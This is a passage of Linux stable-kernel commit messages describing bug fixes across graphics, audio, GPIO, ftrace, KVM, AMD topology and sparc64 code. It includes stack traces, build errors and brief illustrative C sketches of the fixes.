Fix some typos in the commit message
Cc: Daniel Otero <daniel.otero@outlook.com>
Tested-by: Daniel Otero <daniel.otero@outlook.com>
Fixes: d61992565b ("drm/i915: Determine DP++ type 1 DVI adaptor presence based on VBT")
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97994
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1478884464-14251-1-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Daniel Vetter <daniel.vetter@ffwll.ch>
(cherry picked from commit 7a17995a3d)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8e94a46c17 upstream.
External clients which import our bo's wait only
for exclusive dmabuf-fences, not on shared ones,
ditto for bo's which we import from external
providers and write to.
Therefore attach exclusive fences on prime shared buffers
if our exported buffer gets imported by an external
client, or if we import a buffer from an external
exporter.
See discussion in thread:
https://lists.freedesktop.org/archives/dri-devel/2016-October/122370.html
Prime export tested on Intel iGPU + AMD Tonga dGPU as
DRI3/Present Prime render offload, and with the Tonga
standalone as primary gpu.
v2: Add a wait for all shared fences before prime export,
as suggested by Christian Koenig.
v3: - Mark buffer prime_exported in amdgpu_gem_prime_pin,
so we only use the exclusive fence when exporting a
bo to external clients like a separate iGPU, but not
when exporting/importing from/to ourselves as part of
regular DRI3 fd passing.
- Propagate failure of reservation_object_wait_rcu back
to caller.
v4: - Switch to a prime_shared_count counter instead of a
flag, which gets in/decremented on prime_pin/unpin, so
we can switch back to shared fences if all clients
detach from our exported bo.
- Also switch to exclusive fence for prime imported bo's.
v5: - Drop lret, instead use int ret -> long ret, as proposed
by Christian.
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=95472
Tested-by: Mike Lothian <mike@fireburn.co.uk> (v1)
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Cc: Christian König <christian.koenig@amd.com>
Cc: Michel Dänzer <michel.daenzer@amd.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c0a3601363 upstream.
Commit d3cbff1b5 "powerpc: Put exception configuration in a common place"
broke the setting of the AIL bit (which enables taking exceptions with
the MMU still on) on all processors, moving it incorrectly to a function
called only on the boot CPU. This was correct for the guest case but
not when running in hypervisor mode.
This fixes it by partially reverting that commit, putting the setting
back in cpu_ready_for_interrupts().
Fixes: d3cbff1b5a ("powerpc: Put exception configuration in a common place")
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 83d2c9a9c1 upstream.
When using AES-XTS on a Wandboard, we receive a Mode error:
caam_jr 2102000.jr1: 20001311: CCB: desc idx 19: AES: Mode error.
According to the Security Reference Manual, the Low Power AES units
of the i.MX6 do not support the XTS mode. Therefore we must not
register XTS implementations in the Crypto API.
Signed-off-by: Sven Ebenfeld <sven.ebenfeld@gmail.com>
Reviewed-by: Horia Geantă <horia.geanta@nxp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Fixes: c6415a6016 "crypto: caam - add support for acipher xts(aes)"
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
commit e3c9d9d6eb upstream.
Since commit fa93fd4ecc ("regulator: core: Ensure we are at least in
bounds for our constraints") the imx53-qsb board populated with a Dialog
DA9053 PMIC fails to boot:
LDO3: Bringing 3300000uV into 1800000-1800000uV
The LDO3 voltage constraints passed in the device tree do not match
the valid range according to the datasheet, so fix this accordingly to
allow the board booting again.
While at it, fix the other voltage constraints as well.
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Signed-off-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c6a3855391 upstream.
So Sebastian turned off the PIE for kernel builds but that was too late
- Kbuild.include already uses KBUILD_CFLAGS and trying to disable gcc
options with, say, cc-disable-warning, fails:
gcc -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs
...
-Wno-sign-compare -fno-asynchronous-unwind-tables -Wframe-address -c -x c /dev/null -o .31392.tmp
/dev/null:1:0: error: code model kernel does not support PIC mode
because that returns an error and we can't disable the warning. For
example in this case:
KBUILD_CFLAGS += $(call cc-disable-warning,frame-address,)
which leads to gcc issuing all those warnings again.
So let's turn off PIE/PIC at the earliest possible moment, when we
declare KBUILD_CFLAGS so that cc-disable-warning picks it up too.
Also, we need the $(call cc-option ...) because -fno-PIE is supported
since gcc v3.4 and our lowest supported gcc version is 3.2 right now.
Signed-off-by: Borislav Petkov <bp@suse.de>
Cc: Ben Hutchings <ben@decadent.org.uk>
Cc: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Michal Marek <mmarek@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 90944e40ba upstream.
If the gcc is configured to do -fPIE by default then the build aborts
later with:
| Unsupported relocation type: unknown type rel type name (29)
Tagging it stable so it is possible to compile recent stable kernels as
well.
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Michal Marek <mmarek@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 82031ea29e upstream.
Adding -no-PIE to the fstack protector check. -no-PIE was introduced
before -fstack-protector so there is no need for a runtime check.
Without it the build stops:
|Cannot use CONFIG_CC_STACKPROTECTOR_STRONG: -fstack-protector-strong available but compiler is broken
due to -mcmodel=kernel + -fPIE if -fPIE is enabled by default.
Tagging it stable so it is possible to compile recent stable kernels as
well.
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Michal Marek <mmarek@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8ae94224c9 upstream.
Debian started to build the gcc with -fPIE by default so the kernel
build ends before it starts properly with:
|kernel/bounds.c:1:0: error: code model kernel does not support PIC mode
Also add to KBUILD_AFLAGS due to:
|gcc -Wp,-MD,arch/x86/entry/vdso/vdso32/.note.o.d … -mfentry -DCC_USING_FENTRY … vdso/vdso32/note.S
|arch/x86/entry/vdso/vdso32/note.S:1:0: sorry, unimplemented: -mfentry isn’t supported for 32-bit in combination with -fpic
Tagging it stable so it is possible to compile recent stable kernels as
well.
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Michal Marek <mmarek@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ef6000b4c6 upstream.
This effectively reverts commit 377ccbb483 ("Makefile: Mute warning
for __builtin_return_address(>0) for tracing only") because it turns out
that it really isn't tracing only - it's all over the tree.
We already also had the warning disabled separately for mm/usercopy.c
(which this commit also removes), and it turns out that we will also
want to disable it for get_lock_parent_ip(), that is used for at least
TRACE_IRQFLAGS. Which (when enabled) ends up being all over the tree.
Steven Rostedt had a patch that tried to limit it to just the config
options that actually triggered this, but quite frankly, the extra
complexity and abstraction just isn't worth it. We have never actually
had a case where the warning is actually useful, so let's just disable
it globally and not worry about it.
Acked-by: Steven Rostedt <rostedt@goodmis.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Ingo Molnar <mingo@kernel.org>
Cc: Peter Anvin <hpa@zytor.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ad092de60f upstream.
The deselect functionality is ignored for device-trees with
"i2c-mux-idle-disconnect" entries if no platform_data is available.
By enabling the deselect functionality outside the platform_data
block, the logic works as it did in previous kernels.
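The gist is to read the DT property regardless of platform_data; a sketch
(of_property_read_bool() is the standard OF helper, the surrounding
variables are assumptions):
  /* Honour "i2c-mux-idle-disconnect" from the device tree even when no
   * platform_data was supplied. */
  bool idle_disconnect_dt = np &&
          of_property_read_bool(np, "i2c-mux-idle-disconnect");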
Fixes: 7fcac98071 ("i2c: i2c-mux-pca954x: convert to use an explicit i2c mux core")
Signed-off-by: Alex Hemme <ahemme@cisco.com>
Signed-off-by: Ziyang Wu <ziywu@cisco.com>
[touched up a few minor issues /peda]
Signed-off-by: Peter Rosin <peda@axentia.se>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 93d710a65e upstream.
We get the following build error from UM Linux after adding
an entry to drivers/iio/gyro/Kconfig that issues "select I2C_MUX":
ERROR: "devm_ioremap_resource"
[drivers/i2c/muxes/i2c-mux-reg.ko] undefined!
ERROR: "of_address_to_resource"
[drivers/i2c/muxes/i2c-mux-reg.ko] undefined!
It appears that the I2C mux core code depends on HAS_IOMEM
for historical reasons, while CONFIG_I2C_MUX_REG does *not*
have a direct dependency on HAS_IOMEM.
This creates a situation where an allyesconfig or allmodconfig
for UM Linux will select I2C_MUX, and will implicitly enable
I2C_MUX_REG as well, and the compilation will fail for the
register driver.
Fix this up by making I2C_MUX_REG depend on HAS_IOMEM and
removing the dependency from I2C_MUX.
Reported-by: kbuild test robot <fengguang.wu@intel.com>
Reported-by: Jonathan Cameron <jic23@jic23.retrosnub.co.uk>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Acked-by: Jonathan Cameron <jic23@kernel.org>
Acked-by: Peter Rosin <peda@axentia.se>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a2541910d upstream.
The commit [1a3f099101: ALSA: hda - Fix surround output pins for
ASRock B150M mobo] introduced a fixup of pin configs for ASRock
mobos to fix the surround outputs. However, this overrides the pin
configs of the mic pins as if they are outputs-only, effectively
disabling the mic inputs. Of course, it's a regression wrt mic
functionality.
Actually the pins 0x18 and 0x1a don't need to be changed; we just need
to disable the bogus pins 0x14 and 0x15. Then the auto-parser will
pick up mic pins as switchable and assign the surround outputs there.
This patch removes the incorrect pin overrides of NID 0x18 and 0x1a
from the ASRock fixup.
Fixes: 1a3f099101 ('ALSA: hda - Fix surround output pins for ASRock...')
Reported-and-tested-by: Vitor Antunes <vitor.hda@gmail.com>
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=187431
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2ecb704a12 upstream.
The latest Thinkpad laptops use the HKEY_HID LEN0268 instead of
LEN0068; as a result, neither the audio mute LED nor the mic mute LED
can work any more.
After adding the new HKEY_HID into is_thinkpad(), both of them
work well as before.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6ff1a25318 upstream.
The usb-audio driver implements the deferred device disconnection for
the device in use. In this mode, the disconnection callback returns
immediately while the actual ALSA card object removal happens later
when all files get closed. As Shuah reported, this code flow,
however, leads to a use-after-free, detected by KASAN:
BUG: KASAN: use-after-free in snd_usb_audio_free+0x134/0x160 [snd_usb_audio] at addr ffff8801c863ce10
Write of size 8 by task pulseaudio/2244
Call Trace:
[<ffffffff81b31473>] dump_stack+0x67/0x94
[<ffffffff81564ef1>] kasan_object_err+0x21/0x70
[<ffffffff8156518a>] kasan_report_error+0x1fa/0x4e0
[<ffffffff81564ad7>] ? kasan_slab_free+0x87/0xb0
[<ffffffff81565733>] __asan_report_store8_noabort+0x43/0x50
[<ffffffffa0fc0f54>] ? snd_usb_audio_free+0x134/0x160 [snd_usb_audio]
[<ffffffffa0fc0f54>] snd_usb_audio_free+0x134/0x160 [snd_usb_audio]
[<ffffffffa0fc0fb1>] snd_usb_audio_dev_free+0x31/0x40 [snd_usb_audio]
[<ffffffff8243c78a>] __snd_device_free+0x12a/0x210
[<ffffffff8243d1f5>] snd_device_free_all+0x85/0xd0
[<ffffffff8242cae4>] release_card_device+0x34/0x130
[<ffffffff81ef1846>] device_release+0x76/0x1e0
[<ffffffff81b37ad7>] kobject_release+0x107/0x370
.....
Object at ffff8801c863cc80, in cache kmalloc-2048 size: 2048
Allocated:
[<ffffffff810804eb>] save_stack_trace+0x2b/0x50
[<ffffffff81564296>] save_stack+0x46/0xd0
[<ffffffff8156450d>] kasan_kmalloc+0xad/0xe0
[<ffffffff81560d1a>] kmem_cache_alloc_trace+0xfa/0x240
[<ffffffff8214ea47>] usb_alloc_dev+0x57/0xc90
[<ffffffff8216349d>] hub_event+0xf1d/0x35f0
....
Freed:
[<ffffffff810804eb>] save_stack_trace+0x2b/0x50
[<ffffffff81564296>] save_stack+0x46/0xd0
[<ffffffff81564ac1>] kasan_slab_free+0x71/0xb0
[<ffffffff81560929>] kfree+0xd9/0x280
[<ffffffff8214de6e>] usb_release_dev+0xde/0x110
[<ffffffff81ef1846>] device_release+0x76/0x1e0
....
It's the code trying to clear drvdata of the assigned usb_device where
the usb_device itself was already released in usb_release_dev() after
the disconnect callback.
This patch fixes it by checking whether the code path is via the
disconnect callback, i.e. chip->shutdown flag is set.
Fixes: 79289e2419 ('ALSA: usb-audio: Refer to chip->usb_id for quirks...')
Reported-and-tested-by: Shuah Khan <shuahkh@osg.samsung.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 60f8339eb3 upstream.
When locking a GPIO line as IRQ, we go to lengths to
double-check that the line is really set as input before
marking it as used for IRQ. This is not good on GPIO chips
that can sleep, because this function is called in IRQ-safe
context. Just skip this if it can't be checked quickly.
Currently this happens on sleeping expanders such as STMPE
or TC3589x:
BUG: scheduling while atomic: swapper/1/0x00000002
Modules linked in:
CPU: 0 PID: 1 Comm: swapper Not tainted 4.9.0-rc1+ #38
Hardware name: Nomadik STn8815
[<c000f2e0>] (unwind_backtrace) from [<c000d244>] (show_stack+0x10/0x14)
[<c000d244>] (show_stack) from [<c0037b78>] (__schedule_bug+0x54/0x80)
[<c0037b78>] (__schedule_bug) from [<c042df14>] (__schedule+0x3a0/0x460)
[<c042df14>] (__schedule) from [<c042e028>] (schedule+0x54/0xb8)
(...)
This patch fixes that problem and relies on the direction
read from the chip when it was added.
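Conceptually the guard is (can_sleep and get_direction are fields of
struct gpio_chip; the surrounding bookkeeping is omitted):
  int dir = -1;

  /* gpiochip_lock_as_irq() runs in IRQ-safe context: only re-read the
   * direction from hardware when doing so cannot sleep. */
  if (!chip->can_sleep && chip->get_direction)
          dir = chip->get_direction(chip, offset);
  /* else: rely on the direction cached when the chip was added */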
Fixes: 9c10280d85 ("gpio: flush direction status in gpiochip_lock_as_irq()")
Cc: Patrice Chotard <patrice.chotard@st.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f40584200b upstream.
Since commit c4dd1ba355
("mfd: stmpe: Add reset support for all STMPE variant")
we're resetting the STMPE expanders before use.
This caused a regression on the STMPE2401 on the Nomadik
NHK8815:
stmpe-i2c 0-0043: stmpe2401 detected, chip id: 0x101
nmk-i2c 101f8000.i2c0: write to slave 0x43 timed out
nmk-i2c 101f8000.i2c0: no ack received after address transmission
stmpe-i2c 0-0044: stmpe2401 detected, chip id: 0x101
nmk-i2c 101f8000.i2c0: write to slave 0x44 timed out
nmk-i2c 101f8000.i2c0: no ack received after address transmission
It turns out that we start to poll for the reset bit to
go low again too quickly: the STMPE2401 is not yet online and
ready to be asked for the status of the RESET bit.
By introducing a 10ms delay before starting to hammer
the register for information, we get back to normal:
stmpe-i2c 0-0043: stmpe2401 detected, chip id: 0x101
stmpe-i2c 0-0044: stmpe2401 detected, chip id: 0x101
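The fix is essentially a sleep before the poll loop (this runs in process
context, so msleep() is fine):
  #include <linux/delay.h>

  /* Give the STMPE time to come back up after the SYS_CTRL reset before
   * polling the reset bit; 10 ms is enough for the STMPE2401. */
  msleep(10);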
Cc: Amelie Delaunay <amelie.delaunay@st.com>
Fixes: c4dd1ba355 ("mfd: stmpe: Add reset support for all STMPE variant")
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Acked-by: Patrice Chotard <patrice.chotard@st.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 274e43edcd upstream.
Commit 41a3da2b8e ("mfd: intel-lpss: Save register context on
suspend") saved the register context while going to suspend and
also put the device in reset state.
Due to the resetting of the device, the system cannot enter S3/S0ix
states when the no_console_suspend flag is enabled. The system
and serial console both hang. The resetting of the device is not
needed while going to suspend, hence remove this code.
Fixes: 41a3da2b8e ("mfd: intel-lpss: Save register context on suspend")
Signed-off-by: Azhar Shaikh <azhar.shaikh@intel.com>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Reviewed-by: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e1fafdcbe0 upstream.
The initial code for rdmavt carried with it a restriction that was a
vestige from the qib driver, that to dma map a page it had to be less
than a page size. This is not the case on modern hardware, both qib and
hfi1 will be just fine with unaligned map requests.
This fixes a 4.8 regression whereby an IPoIB transfer of > PAGE_SIZE
will hang because the dma map page call always fails. This was
introduced after commit 5faba54695 ("IB/ipoib: Report SG feature
regardless of HW UD CSUM capability") added the capability to use SG by
default. Rather than override this, the HW supports it, so allow SG.
Reviewed-by: Mike Marciniszyn <mike.marciniszyn@intel.com>
Signed-off-by: Dennis Dalessandro <dennis.dalessandro@intel.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 59c3b76cc6 upstream.
If pos is at the beginning of a page and copied is zero then page is not
zeroed but is marked uptodate.
Fix by skipping everything except unlock/put of page if zero bytes were
copied.
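A sketch of the early-out in the ->write_end() path (the label and variable
names follow the generic pattern and are assumptions here):
  /* If nothing was copied, don't zero-fill the page or mark it uptodate;
   * just fall through to unlock_page()/put_page(). */
  if (!copied)
          goto unlock;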
Reported-by: Al Viro <viro@zeniv.linux.org.uk>
Fixes: 6b12c1b37e ("fuse: Implement write_begin/write_end callbacks")
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7ee7e87dfb upstream.
The type flags in the irq descriptor are there for historical reasons and
only updated via irq_modify_status() or irq_set_type(). Both functions also
update the type flags in irqdata. __setup_irq() is the only leftover user
of the type flags in the irq descriptor.
If __setup_irq() is called with empty irq type flags, then the type flags
are retrieved from irqdata. If an interrupt is shared, then the type flags
are compared with the type flags stored in the irq descriptor.
On x86 the ioapic does not have an irq_set_type() callback because the type
is defined in the BIOS tables and cannot be changed. The type is stored in
irqdata at setup time without updating the type data in the irq
descriptor. As a result the comparison described above fails.
There is no point in updating the irq descriptor flags because the only
relevant storage is irqdata. Use the type flags from irqdata for both
retrieval and comparison in __setup_irq() instead.
Aside from that, the printout in case of non-matching type flags has the old
and new type flags arguments flipped. Fix that as well.
For correctness sake the flags stored in the irq descriptor should be
removed, but this is beyond the scope of this bugfix and will be done in a
later patch.
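A sketch of the __setup_irq() change, using the irqdata accessor
(irqd_get_trigger_type()) rather than the descriptor flags (desc, old and
new are the usual local variables in that function; exact placement is
assumed):
  unsigned int oldtype = irqd_get_trigger_type(&desc->irq_data);

  /* If the new action did not specify a trigger, inherit the programmed one. */
  if (!(new->flags & IRQF_TRIGGER_MASK))
          new->flags |= oldtype;

  /* For shared interrupts, compare against the programmed type, not the
   * possibly stale flags in the irq descriptor. */
  if (oldtype != (new->flags & IRQF_TRIGGER_MASK))
          goto mismatch;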
Fixes: 4b357daed6 ("genirq: Look-up trigger type if not specified by caller")
Reported-and-tested-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Marc Zyngier <marc.zyngier@arm.com>
Cc: Jon Hunter <jonathanh@nvidia.com>
Link: http://lkml.kernel.org/r/alpine.DEB.2.20.1611072020360.3501@nanos
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 546fece4ea upstream.
When a module is first loaded and its function ip records are added to the
ftrace list of functions to modify, they are set to DISABLED, as their text
is still in a read-only state. When the module is fully loaded, and can be
updated, the flag is cleared, and if there are any functions that should be
tracing them, they are updated at that moment.
But there are several locations that do record accounting and should ignore
records that are marked as disabled, or they can cause issues.
Alexei already fixed one location, but others need to be addressed.
Fixes: b7ffffbb46 "ftrace: Add infrastructure for delayed enabling of module functions"
Reported-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 977c1f9c8c upstream.
ftrace_shutdown() checks the sanity of ftrace records,
and if dyn_ftrace->flags is not zero, it will warn.
It can happen that 'flags' are set to FTRACE_FL_DISABLED at this point,
since some module was loaded, but before ftrace_module_enable()
cleared the flags for this module.
In other words the module.c is doing:
ftrace_module_init(mod); // calls ftrace_update_code() that sets flags=FTRACE_FL_DISABLED
... // here ftrace_shutdown() is called that warns, since
err = prepare_coming_module(mod); // didn't have a chance to clear FTRACE_FL_DISABLED
Fix it by ignoring disabled records.
It's similar to what __ftrace_hash_rec_update() is already doing.
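The added check in the record-accounting loops is essentially:
  /* Skip records of modules whose text is not yet writable/enabled. */
  if (rec->flags & FTRACE_FL_DISABLED)
          continue;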
Link: http://lkml.kernel.org/r/1478560460-3818619-1-git-send-email-ast@fb.com
Fixes: b7ffffbb46 "ftrace: Add infrastructure for delayed enabling of module functions"
Signed-off-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b112c84a6f upstream.
KVM calls kvm_pmu_set_counter_event_type() when PMCCFILTR is configured.
But this function can't deal with PMCCFILTR correctly because the evtCount
bits of PMCCFILTR, which are reserved as 0, conflict with the SW_INCR event
type of the other PMXEVTYPER<n> registers. To fix it, when eventsel == 0, this
function shouldn't return immediately; instead it needs to check further
if select_idx is ARMV8_PMU_CYCLE_IDX.
Another issue is that KVM shouldn't copy the eventsel bits of PMCCFILTR
blindly to attr.config. Instead it ought to convert the request to the
"cpu cycle" event type (i.e. 0x11).
To support this patch and to prevent duplicated definitions, a limited
set of ARMv8 perf event types were relocated from perf_event.c to
asm/perf_event.h.
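A hedged sketch of the two changes (constants from arm64's asm/perf_event.h
and KVM's arm_pmu header; the surrounding function body is assumed):
  /* evtCount == 0 means SW_INCR only for event counters; for the cycle
   * counter (PMCCFILTR) a zero field is just the reserved value. */
  if (eventsel == ARMV8_PMUV3_PERFCTR_SW_INCR &&
      select_idx != ARMV8_PMU_CYCLE_IDX)
          return;

  /* The cycle counter always counts CPU cycles (0x11), whatever the
   * eventsel bits of PMCCFILTR say. */
  attr.config = (select_idx == ARMV8_PMU_CYCLE_IDX) ?
                ARMV8_PMUV3_PERFCTR_CPU_CYCLES : eventsel;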
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Wei Huang <wei@redhat.com>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9e3f7a2969 upstream.
We're missing the handling code for the cycle counter accessed
from a 32bit guest, leading to unexpected results.
Signed-off-by: Wei Huang <wei@redhat.com>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1650b4ebc9 upstream.
Function user_notifier_unregister should be called only once for each
registered user notifier.
Function kvm_arch_hardware_disable can be executed from an IPI context
which could cause a race condition with a VCPU returning to user mode
and attempting to unregister the notifier.
Signed-off-by: Ignacio Alvarado <ikalvarado@google.com>
Fixes: 18863bdd60 ("KVM: x86 shared msr infrastructure")
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b0b6e86846 upstream.
cpu_llc_id (Last Level Cache ID) derivation on AMD Fam17h has an
underflow bug when extracting the socket_id value. It starts from 0
so subtracting 1 from it will result in an invalid value. This breaks
scheduling topology later on since the cpu_llc_id will be incorrect.
For example, the cpu_llc_id of the *other* CPU in the loops in
set_cpu_sibling_map() underflows and we're generating the funniest
thread_siblings masks and then when I run 8 threads of nbench, they get
spread around the LLC domains in a very strange pattern which doesn't
give you the normal scheduling spread one would expect for performance.
Other things like EDAC use cpu_llc_id so they will be b0rked too.
So, the APIC ID is preset in APICx020 for bits 3 and above: they contain
the core complex, node and socket IDs.
The LLC is at the core complex level so we can find a unique cpu_llc_id
by right shifting the APICID by 3 because then the least significant bit
will be the Core Complex ID.
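The derivation then becomes a plain shift (c->apicid and the per-CPU
cpu_llc_id are the existing kernel objects):
  /* Bits [2:0] of the APIC ID select the thread/core within a core
   * complex, so the core complex ID - and hence the LLC ID - is
   * apicid >> 3. */
  per_cpu(cpu_llc_id, cpu) = c->apicid >> 3;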
Tested-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Yazen Ghannam <Yazen.Ghannam@amd.com>
[ Cleaned up and extended the commit message. ]
Signed-off-by: Borislav Petkov <bp@suse.de>
Acked-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Aravind Gopalakrishnan <aravindksg.lkml@gmail.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Fixes: 3849e91f57 ("x86/AMD: Fix last level cache topology for AMD Fam17h systems")
Link: http://lkml.kernel.org/r/20161108083506.rvqb5h4chrcptj7d@pd.tnic
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 0fd0ff01d4 ]
Now that all of the user copy routines are converted to return
accurate residual lengths when an exception occurs, we no longer need
the broken fixup routines.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ee841d0aff ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e93704e446 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7ae3aaf53f ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9570770480 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit cb736fdbb2 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d0796b555b ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 0096ac9f47 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 83a17d2661 ]
The fixup helper function mechanism for handling user copy faults
is not 100% accurate, and can never be made so.
We are going to transition the code to return the running return
length, which is always kept track of in one or more registers
of each of these routines.
In order to convert them one by one, we have to allow the existing
behavior to continue functioning.
Therefore make all the copy code that wants the fixup helper to be
used return negative one.
After all of the user copy routines have been converted, this logic
and the fixup helpers themselves can be removed completely.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a74ad5e660 ]
When the vmalloc area gets fragmented, and because the firmware
mapping area sits between where modules live and the vmalloc area, we
can sometimes receive requests for enormous kernel TLB range flushes.
When this happens the cpu just spins flushing billions of pages and
this triggers the NMI watchdog and other problems.
We took care of this on the TSB side by doing a linear scan of the
table once we pass a certain threshold.
Do something similar for the TLB flush, however we are limited by
the TLB flush facilities provided by the different chip variants.
First of all we use a (mostly arbitrary) cut-off of 256K, which is
about 32 pages. This can be tuned in the future.
The huge range code path for each chip works as follows:
1) On spitfire we flush all non-locked TLB entries using diagnostic
accesses.
2) On cheetah we use the "flush all" TLB flush.
3) On sun4v/hypervisor we do a TLB context flush on context 0, which
unlike previous chips does not remove "permanent" or locked
entries.
We could probably do something better on spitfire, such as limiting
the flush to kernel TLB entries or even doing range comparisons.
However that probably isn't worth it since those chips are old and
the TLB only had 64 entries.
Reported-by: James Clarke <jrtc27@jrtc27.com>
Tested-by: James Clarke <jrtc27@jrtc27.com>
